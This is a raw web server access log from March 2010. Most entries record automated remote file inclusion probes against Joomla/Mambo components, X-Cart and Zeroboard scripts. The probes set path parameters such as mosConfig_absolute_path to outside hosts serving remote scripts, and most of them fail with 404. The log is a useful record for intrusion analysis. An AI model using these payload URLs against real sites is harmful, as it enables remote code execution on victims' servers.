123.143.29.250 - - [04/Mar/2010:08:49:18 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:08:49:19 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [04/Mar/2010:08:49:22 -0800] "GET /logs/access_100126.log//?_zb_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [04/Mar/2010:08:49:23 -0800] "GET /logs//?_zb_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [04/Mar/2010:08:49:23 -0800] "GET /?_zb_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:08:49:46 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:50:28 -0800] "GET /logs//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:50:28 -0800] "GET /components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:50:31 -0800] "GET /logs/access_100224.log%20%20//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:08:51:05 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:51:11 -0800] "GET /components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:51:11 -0800] "GET /logs/access_100224.log%20%20//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:51:11 -0800] "GET /logs//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:08:51:15 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:51:22 -0800] "GET /logs/access_100128.log%20%20//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:51:37 -0800] "GET /logs/access_100218.log//ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:51:43 -0800] "GET /logs/access_100224.log%20%20//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:51:43 -0800] "GET /logs//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:51:43 -0800] "GET /components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:51:47 -0800] "GET /logs/access_100209.log//ask_password.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:51:53 -0800] "GET /logs/access_100128.log%20%20//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:08:52:07 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [04/Mar/2010:08:52:45 -0800] "GET /logs//?_zb_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [04/Mar/2010:08:52:46 -0800] "GET /?_zb_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [04/Mar/2010:08:52:49 -0800] "GET /logs/access_100126.log%20%20//?_zb_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:53:48 -0800] "GET /logs/access_100224.log%20%20//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:53:48 -0800] "GET /logs//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:53:48 -0800] "GET /components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:08:53:53 -0800] "GET /logs/access_100128.log%20%20//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [04/Mar/2010:08:54:36 -0800] "GET /pnetsite/whatisit.php HTTP/1.1" 200 2030 "http://pixero.net/pnetsite/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "pixero.net"
78.188.102.171 - - [04/Mar/2010:08:54:36 -0800] "GET /pnetsite/standard.css HTTP/1.1" 200 488 "http://pixero.net/pnetsite/whatisit.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "pixero.net"
78.188.102.171 - - [04/Mar/2010:08:54:37 -0800] "GET /pnetsite/download.php HTTP/1.1" 200 2340 "http://pixero.net/pnetsite/whatisit.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "pixero.net"
200.63.96.201 - - [04/Mar/2010:08:55:38 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:08:55:38 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:08:55:38 -0800] "GET /logs/access_100220.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:57:34 -0800] "GET /logs/access_100217.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:57:34 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:08:57:35 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.124 - - [04/Mar/2010:08:57:35 -0800] "GET / HTTP/1.0" 200 13498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.atesh.info"
67.195.112.124 - - [04/Mar/2010:08:57:35 -0800] "GET /atesh_info/ai.css HTTP/1.0" 200 487 "http://www.atesh.info/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.atesh.info"
58.150.99.144 - - [04/Mar/2010:08:57:37 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:08:57:42 -0800] "GET /logs/access_100208.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:08:57:42 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:08:57:42 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:57:54 -0800] "GET /logs/access_100203.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:57:54 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:57:54 -0800] "GET /logs/access_100217.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:08:57:54 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:08:58:20 -0800] "GET /logs/access_100129.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [04/Mar/2010:09:01:00 -0800] "GET /board/bbs/delete_all.php?board_skin_path=?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [04/Mar/2010:09:01:00 -0800] "GET /logs//board/bbs/delete_all.php?board_skin_path=?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [04/Mar/2010:09:01:00 -0800] "GET /logs/access_100128.log%20//board/bbs/delete_all.php?board_skin_path=?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:02:03 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:02:03 -0800] "GET /logs/access_100217.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:02:04 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [04/Mar/2010:09:02:10 -0800] "GET /logs/setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [04/Mar/2010:09:02:11 -0800] "GET /setup.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:02:32 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:02:35 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:02:36 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:02:36 -0800] "GET /logs/access_100220.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:02:37 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:02:37 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:09:02:42 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:09:02:48 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:02:56 -0800] "GET /logs/access_100203.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:03:00 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:03:40 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:03:41 -0800] "GET /logs/access_100217.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:04:08 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:04:08 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:04:08 -0800] "GET /logs/access_100220.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:09:04:15 -0800] "GET /logs/access_100129.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:04:19 -0800] "GET /logs/access_100203.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:09:04:41 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:09:04:44 -0800] "GET /logs/access_100202.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:09:04:44 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:05:21 -0800] "GET /logs/access_100225.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:09:06:38 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:09:06:38 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:09:06:38 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:09:06:51 -0800] "GET /logs/access_100129.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:09:10:32 -0800] "GET /logs/access_100205.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:11:39 -0800] "GET /logs/access_100209.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:11:39 -0800] "GET /logs///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:11:40 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:11:48 -0800] "GET /logs/access_100209.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:11:48 -0800] "GET /logs///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:11:48 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:11:58 -0800] "GET /admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:11:58 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:12:00 -0800] "GET /logs/access_100203.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:12:01 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:12:05 -0800] "GET /admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:12:05 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:12:06 -0800] "GET /logs/access_100203.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:12:06 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:12:06 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:12:08 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:12:09 -0800] "GET /admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [04/Mar/2010:09:12:12 -0800] "GET /logs/access_100209.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [04/Mar/2010:09:12:19 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [04/Mar/2010:09:12:19 -0800] "GET /logs/access_100209.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [04/Mar/2010:09:12:20 -0800] "GET /logs/access_100203.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [04/Mar/2010:09:12:28 -0800] "GET /logs/access_100203.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:12:30 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:12:32 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:12:32 -0800] "GET /logs///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:12:32 -0800] "GET /logs/access.log%20%20///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:12:34 -0800] "GET /logs/access_100209.log%20%20///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
